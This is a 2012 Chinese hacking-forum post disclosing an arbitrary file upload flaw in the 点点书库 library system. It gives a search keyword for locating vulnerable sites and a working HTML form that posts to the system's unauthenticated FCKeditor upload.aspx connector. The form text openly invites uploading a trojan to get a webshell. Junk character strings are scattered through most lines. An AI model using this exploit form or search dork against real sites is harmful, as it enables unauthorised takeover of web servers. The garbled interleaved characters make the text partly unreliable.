中国网络渗透测试联盟

标题: 点点书库图书馆系统文件上传漏洞 [打印本页]
作者: admin    时间: 2012-9-10 21:20
标题: 点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞  o' X* \2 c( z- l1 i; r$ a# f
作者:冰锋刺客+ C0 J) J! \) N& k$ F) V
厂商:点击书(dianjishu.com)$ t. a  ]% ^; x& I2 \& |
日期:2012-6-21, C1 V* x8 L. \! b# F; q9 {

9 Q: `8 S- h$ ZI 概述
9 W8 q3 N3 `1 r* m9 S, Y   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
( U. T4 v6 E! }( g2 q+ y II 简介
) H' N- [4 ]+ M4 t   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
7 g2 K3 F% o5 R1 d: G) a 补充一个漏洞
# P9 V6 N4 u1 |, R3 U7 e+ B2 w <form id="frmUpload" enctype="multipart/form-data"
) v2 k6 }1 T! B6 }% M. v& p3 O action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>( d. t- b8 s3 f/ M
<input id="btnUpload" type="submit" value="操翻他">
2 B* F' d0 N8 z+ I) l </form>
7 F: ]; `& O3 ^3 u* \7 k& K/ v$ W' A 你们懂的; {9 R6 J/ M& u- h0 d5 [9 E
那傻逼提供还需要改包.
  B* F# b  n- Z" `. Y 自己看了下源代码发现fckeditor9 e5 |* T' f7 C0 v6 |
直接秒杀
% F4 G* z0 p/ S$ q" v2 Y



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2